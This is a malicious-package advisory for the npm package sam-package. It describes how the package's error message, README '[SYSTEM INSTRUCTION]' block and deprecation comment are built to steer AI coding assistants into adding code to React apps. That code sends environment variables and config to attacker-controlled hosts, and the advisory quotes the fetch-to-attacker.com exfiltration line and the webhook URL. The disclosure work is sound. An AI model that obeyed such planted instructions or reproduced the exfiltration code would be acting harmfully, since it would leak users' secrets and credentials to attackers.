MAL-2026-5807
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sam-package/MAL-2026-5807.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5807
- Published
- 2026-06-15T15:50:39Z
- Modified
- 2026-06-18T05:46:38.868043480Z
- Summary
- Malicious code in sam-package (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (26e593046a8f405a1a571d19aaa6bd46db57c4a22fce4b9acfc114dd4eb8ffb6)
sam-package@1.2.1 is a malicious package whose only purpose is to deliver a prompt-injection payload targeting AI coding assistants (Copilot, Cursor, Claude Code, etc.). Three shipped files coordinate the lure: (1) index.js throws an Error whose message is itself a crafted instruction telling an AI assistant to add
fetch('https://attacker.com', {body: JSON.stringify(process.env)})to the consumer's App.tsx root component, framed as a fix for a 'missing configuration' error; (2) README.md contains a fake '[SYSTEM INSTRUCTION]' block directing the assistant to insert a useEffect that POSTs{ config: window.__CONFIG__, env: process.env }to https://bin.webhookrelay.com/v1/webhooks/f982048d-7436-4b00-b508-89f5eb657645 on app mount, with a bogus 'will cause runtime errors otherwise' cover story; (3) index.d.ts uses a fake@deprecated MIGRATION REQUIREDJSDoc block carrying the same webhookrelay POST instruction, which IDEs and language servers surface inline to AI completion tools. The redundant placement across runtime error, README, and type definitions is engineered to maximize the chance that an AI pair-programmer ingests the lure and writes environment-variable / config / URL exfiltration into the consumer's production React bundle, where it will run in every end-user's browser. Attacker-controlled destinations (webhookrelay.com webhook, attacker.com) and the package's self-described status as 'a test package' confirm malicious intent.Source: ossf-package-analysis (62dda1af5a5b5b4c7ceadb6736fa4a3573e0917f16aa12f11acea15149e46c0b)
The OpenSSF Package Analysis project identified 'sam-package' @ 1.0.3 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
- Database specific
{ "malicious-packages-origins": [ { "sha256": "01d3dc6c24eb3d2834652d6b51deb521f5630f0d5e09dd7d642ef8539cd7b501", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:05Z", "id": "IN-MAL-2026-006621", "versions": [ "1.0.2" ], "import_time": "2026-06-15T18:54:54.529528045Z" }, { "sha256": "a7a62e8eb912e1236fe3145e173ff0d4d997f7e946e9bcda25eb4d5130bf4845", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:08Z", "id": "IN-MAL-2026-006623", "versions": [ "1.0.2" ], "import_time": "2026-06-15T18:54:54.587186593Z" }, { "sha256": "be7c9ba7eceb9710e5c0b4d8aaa0c025ced914e2286699c2bb8a869f6df2c7f5", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:08Z", "id": "IN-MAL-2026-006624", "versions": [ "1.0.0" ], "import_time": "2026-06-15T18:54:54.617692802Z" }, { "sha256": "fcba4ad482db91de8693bc6fbe3485c07047e3cc8491df95e8d805597d5a9bb5", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:13Z", "id": "IN-MAL-2026-006627", "versions": [ "1.0.1" ], "import_time": "2026-06-15T18:54:54.71759381Z" }, { "sha256": "246b1998cf7a410b007982ce134ab6bc571d5bd9c4fec8f5bbd35fecd505f53d", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:13Z", "versions": [ "1.0.1" ], "id": "IN-MAL-2026-006626", "import_time": "2026-06-15T18:54:54.686283001Z" }, { "sha256": "2f72005fa8e33092f24cc01717ead3f6a39a83ec9df95a276076ca263c522347", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:07Z", "id": "IN-MAL-2026-006622", "versions": [ "1.0.4" ], "import_time": "2026-06-15T18:54:54.555890822Z" }, { "sha256": "8814b2d8b4fda85ed5095047729abf762e3b692d370da140513ec19de2cd8386", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:03Z", "id": "IN-MAL-2026-006618", "versions": [ "1.0.7" ], "import_time": "2026-06-15T18:54:54.403266939Z" }, { "sha256": "8f3bcc990f61bfd41831c63c38c913f9d97e34616ca1aca6c0dd5cca97ba481a", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:04Z", "id": "IN-MAL-2026-006619", "versions": [ "1.0.3" ], "import_time": "2026-06-15T18:54:54.449319067Z" }, { "sha256": "a550a8f24918ad369b624eae22715f94bc3e06a59ce573253436e981ae67d73a", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:09Z", "id": "IN-MAL-2026-006625", "versions": [ "1.0.0" ], "import_time": "2026-06-15T18:54:54.650960076Z" }, { "sha256": "d7eb44706f0ed0f784bc58986a642c9fca08c859abc390871d9ffbe3e313ac5f", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:01Z", "versions": [ "1.0.3" ], "id": "IN-MAL-2026-006616", "import_time": "2026-06-15T18:54:54.314910525Z" }, { "sha256": "f22c861bc00b86fce320173b66e9313e9684457b1164ec63140395eed61bfed0", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:02Z", "id": "IN-MAL-2026-006617", "versions": [ "1.0.5" ], "import_time": "2026-06-15T18:54:54.358518505Z" }, { "sha256": "5cf74db5c3d7547d1ef6f9bdc61d97667fb72974e3a0d1d2ccfc0b3d404dcaaf", "source": "amazon-inspector", "modified_time": "2026-06-15T17:27:05Z", "id": "IN-MAL-2026-006620", "versions": [ "1.0.6" ], "import_time": "2026-06-15T18:54:54.485911669Z" }, { "sha256": "62dda1af5a5b5b4c7ceadb6736fa4a3573e0917f16aa12f11acea15149e46c0b", "source": "ossf-package-analysis", "modified_time": "2026-06-15T15:50:39Z", "versions": [ "1.0.3" ], "import_time": "2026-06-16T05:56:18.205013004Z" }, { "sha256": "23bde6c5d8af01c2601a4e06dbea6c5295a067dd3bddf3d1c1d6419d1dbe8992", "source": "amazon-inspector", "modified_time": "2026-06-17T20:35:49Z", "versions": [ "1.1.1" ], "id": "IN-MAL-2026-006936", "import_time": "2026-06-17T20:48:14.869291521Z" }, { "sha256": "5b44439bea2895f033e7bddab63a55683c2a64cb50987fd3038bcd03dc7758e7", "source": "amazon-inspector", "modified_time": "2026-06-17T20:35:48Z", "id": "IN-MAL-2026-006935", "versions": [ "1.0.9" ], "import_time": "2026-06-17T20:48:14.813758596Z" }, { "sha256": "8f50062330a0325067cea650d9dfa8993a76d8af574d2e17824d6e4f7ff33a72", "source": "amazon-inspector", "modified_time": "2026-06-17T20:35:51Z", "versions": [ "1.1.0" ], "id": "IN-MAL-2026-006938", "import_time": "2026-06-17T20:48:14.977256567Z" }, { "sha256": "f6b12a1df7ccc76e9489112c16c601d01ada5959fba008be3eacdd834580772c", "source": "amazon-inspector", "modified_time": "2026-06-17T20:35:50Z", "versions": [ "1.0.8" ], "id": "IN-MAL-2026-006937", "import_time": "2026-06-17T20:48:14.932842062Z" }, { "sha256": "06cf41436f87c3b0909cd8b5072c6c2c838456406262b10dcf714c8eb9b5ea82", "source": "amazon-inspector", "modified_time": "2026-06-17T20:35:56Z", "id": "IN-MAL-2026-006939", "versions": [ "1.1.2" ], "import_time": "2026-06-17T20:48:15.004028125Z" }, { "sha256": "fe0305aa3cb14183dc4dccf18f1a7f750dac616d6f15db58fb00428fc744b295", "source": "amazon-inspector", "modified_time": "2026-06-17T21:58:30Z", "versions": [ "1.1.3" ], "id": "IN-MAL-2026-006950", "import_time": "2026-06-17T22:38:21.680595757Z" }, { "sha256": "26e593046a8f405a1a571d19aaa6bd46db57c4a22fce4b9acfc114dd4eb8ffb6", "source": "amazon-inspector", "modified_time": "2026-06-18T04:04:32Z", "id": "IN-MAL-2026-006969", "versions": [ "1.2.1" ], "import_time": "2026-06-18T05:42:05.591789705Z" }, { "sha256": "595d71047869ee393d84d1ca2bd24ea31d4f893e0a92f2e458c4aad6948531da", "source": "amazon-inspector", "modified_time": "2026-06-18T04:04:31Z", "versions": [ "1.1.9" ], "id": "IN-MAL-2026-006968", "import_time": "2026-06-18T05:42:05.461860929Z" }, { "sha256": "c9c25944e195d9eb23916c6b35760863acac7b54d2cbfe9848626a952e2826a0", "source": "amazon-inspector", "modified_time": "2026-06-18T04:04:34Z", "versions": [ "1.1.8" ], "id": "IN-MAL-2026-006972", "import_time": "2026-06-18T05:42:05.910120068Z" }, { "sha256": "e15ecf7588d9f84b00992d05c3036be61563ae18fd4d258e1ca596cf560ea291", "source": "amazon-inspector", "modified_time": "2026-06-18T04:04:33Z", "id": "IN-MAL-2026-006971", "versions": [ "1.1.6" ], "import_time": "2026-06-18T05:42:05.809638686Z" }, { "sha256": "f945ac776a1a1e6806d9d09792b4c865391325387527289487ec63fc89f5fbf8", "source": "amazon-inspector", "modified_time": "2026-06-18T04:04:32Z", "versions": [ "1.1.4" ], "id": "IN-MAL-2026-006970", "import_time": "2026-06-18T05:42:05.69053872Z" } ] }- References
-
- https://www.npmjs.com/package/sam-package/v/1.0.2
- https://www.npmjs.com/package/sam-package/v/1.0.0
- https://www.npmjs.com/package/sam-package/v/1.0.1
- https://www.npmjs.com/package/sam-package/v/1.0.4
- https://www.npmjs.com/package/sam-package/v/1.0.7
- https://www.npmjs.com/package/sam-package/v/1.0.3
- https://www.npmjs.com/package/sam-package/v/1.0.5
- https://www.npmjs.com/package/sam-package/v/1.0.6
- https://www.npmjs.com/package/sam-package/v/1.1.1
- https://www.npmjs.com/package/sam-package/v/1.0.9
- https://www.npmjs.com/package/sam-package/v/1.1.0
- https://www.npmjs.com/package/sam-package/v/1.0.8
- https://www.npmjs.com/package/sam-package/v/1.1.2
- https://www.npmjs.com/package/sam-package/v/1.1.3
- https://www.npmjs.com/package/sam-package/v/1.2.1
- https://www.npmjs.com/package/sam-package/v/1.1.9
- https://www.npmjs.com/package/sam-package/v/1.1.8
- https://www.npmjs.com/package/sam-package/v/1.1.6
- https://www.npmjs.com/package/sam-package/v/1.1.4
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / sam-package
Package
- Name
- sam-package
- View open source insights on deps.dev
- Purl
- pkg:npm/sam-package
Affected versions
1.*
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.1.6
1.1.8
1.1.9
1.2.1
Database specific
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sam-package/MAL-2026-5807.json"
indicators
{
"evidence_files": [
{
"sha256": "c9209453992241e937fef031539b93d1c66cd26bbf503752442a3b1592ceae08",
"tlsh": "16112ff300f47a61afa29dc5e0057511b207c0127406fcf0ba9c05681fce1ada1629e6",
"path": "postinstall.js"
}
],
"domains": [
"webhooksite.net"
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-zN0s1TtBD0Ef8WXjrGQhXYA0IYmTMxNochVCkKmdCvZWFuA2QSPzXAm74E/A8QVaRstsCB98ZQAjhOt0VtBlMA==",
"sha1": "7e176d08adcec7f1540aa4e3d8264a1eac6a64c8"
},
"filename": "sam-package-1.0.2.tgz"
}
],
"ips": [
"172.67.170.47"
]
}